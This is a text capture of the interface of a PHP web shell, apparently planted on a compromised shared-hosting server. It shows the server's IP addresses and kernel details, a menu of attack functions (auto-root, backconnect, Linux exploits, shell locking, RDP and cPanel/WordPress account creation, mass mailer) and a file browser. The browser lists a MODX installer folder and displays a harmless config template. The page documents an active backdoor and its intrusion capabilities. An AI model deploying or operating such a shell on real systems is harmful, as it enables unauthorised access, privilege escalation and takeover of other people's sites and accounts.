Linux premium155.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
LiteSpeed
: 162.0.235.200 | : 18.119.167.189
Cant Read [ /etc/named.conf ]
7.4.33
varifktc
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
softaculous /
modx /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
php82
[ DIR ]
drwxr-xr-x
changelog.txt
6.53
KB
-rw-r--r--
clone.php
8.02
KB
-rw-r--r--
config.core.php
287
B
-rw-r--r--
config.inc.php
3.13
KB
-rw-r--r--
edit.php
5.33
KB
-rw-r--r--
edit.xml
433
B
-rw-r--r--
extend.php
11.65
KB
-rw-r--r--
fileindex.php
72
B
-rw-r--r--
import.php
3.28
KB
-rw-r--r--
info.xml
3.81
KB
-rw-r--r--
install.js
921
B
-rw-r--r--
install.php
6.49
KB
-rw-r--r--
install.xml
1.05
KB
-rw-r--r--
md5
7.33
KB
-rw-r--r--
modhashing.class.php
6.16
KB
-rw-r--r--
modpbkdf2.class.php
2.45
KB
-rw-r--r--
modx.sql
162.08
KB
-rw-r--r--
modx.zip
22.62
MB
-rw-r--r--
notes.txt
1.52
KB
-rw-r--r--
update_pass.php
672
B
-rw-r--r--
upgrade.php
4
KB
-rw-r--r--
upgrade.xml
306
B
-rw-r--r--
xpdo.class.php
129.25
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : config.inc.php
<?php /** * MODX Configuration file */ $database_type = 'mysql'; $database_server = '[[softdbhost]]'; $database_user = '[[softdbuser]]'; $database_password = '[[softdbpass]]'; $database_connection_charset = 'utf8'; $dbase = '[[softdb]]'; $table_prefix = '[[dbprefix]]'; $database_dsn = 'mysql:host=[[softdbhost]];dbname=[[softdb]];charset=utf8'; $config_options = array ( ); $driver_options = array ( ); $lastInstallTime = [[timestamp]]; $site_id = 'modx[[site_id]]'; $site_sessionname = 'SN[[site_sessionname]]'; $https_port = '443'; $uuid = '[[uuid]]'; if (!defined('MODX_CORE_PATH')) { $modx_core_path= '[[softpath]]/core/'; define('MODX_CORE_PATH', $modx_core_path); } if (!defined('MODX_PROCESSORS_PATH')) { $modx_processors_path= '[[softpath]]/core/src/Revolution/Processors/'; define('MODX_PROCESSORS_PATH', $modx_processors_path); } if (!defined('MODX_CONNECTORS_PATH')) { $modx_connectors_path= '[[softpath]]/connectors/'; $modx_connectors_url= '[[relativeurl]]/connectors/'; define('MODX_CONNECTORS_PATH', $modx_connectors_path); define('MODX_CONNECTORS_URL', $modx_connectors_url); } if (!defined('MODX_MANAGER_PATH')) { $modx_manager_path= '[[softpath]]/manager/'; $modx_manager_url= '[[relativeurl]]/manager/'; define('MODX_MANAGER_PATH', $modx_manager_path); define('MODX_MANAGER_URL', $modx_manager_url); } if (!defined('MODX_BASE_PATH')) { $modx_base_path= '[[softpath]]/'; $modx_base_url= '[[relativeurl]]/'; define('MODX_BASE_PATH', $modx_base_path); define('MODX_BASE_URL', $modx_base_url); } if(defined('PHP_SAPI') && (PHP_SAPI == "cli" || PHP_SAPI == "embed")) { $isSecureRequest = false; } else { $isSecureRequest = ((isset($_SERVER['HTTPS']) && !empty($_SERVER['HTTPS']) && strtolower($_SERVER['HTTPS']) !== 'off') || parse_url('http://' . $_SERVER['HTTP_HOST'], PHP_URL_PORT) == $https_port); } if (!defined('MODX_URL_SCHEME')) { $url_scheme = $isSecureRequest ? 'https://' : 'http://'; define('MODX_URL_SCHEME', $url_scheme); } if (!defined('MODX_HTTP_HOST')) { if(defined('PHP_SAPI') && (PHP_SAPI == "cli" || PHP_SAPI == "embed")) { $http_host='[[domhost]]'; define('MODX_HTTP_HOST', $http_host); } else { $http_host = array_key_exists('HTTP_HOST', $_SERVER) ? parse_url($url_scheme . $_SERVER['HTTP_HOST'], PHP_URL_HOST) : '[[domhost]]'; $http_port = parse_url($url_scheme . $_SERVER['HTTP_HOST'], PHP_URL_PORT); $http_host .= in_array($http_port, [null, 80, 443]) ? '' : ':' . $http_port; define('MODX_HTTP_HOST', $http_host); } } if (!defined('MODX_SITE_URL')) { $site_url= $url_scheme . $http_host . MODX_BASE_URL; define('MODX_SITE_URL', $site_url); } if (!defined('MODX_ASSETS_PATH')) { $modx_assets_path= '[[softpath]]/assets/'; $modx_assets_url= '[[relativeurl]]/assets/'; define('MODX_ASSETS_PATH', $modx_assets_path); define('MODX_ASSETS_URL', $modx_assets_url); } if (!defined('MODX_LOG_LEVEL_FATAL')) { define('MODX_LOG_LEVEL_FATAL', 0); define('MODX_LOG_LEVEL_ERROR', 1); define('MODX_LOG_LEVEL_WARN', 2); define('MODX_LOG_LEVEL_INFO', 3); define('MODX_LOG_LEVEL_DEBUG', 4); }
Close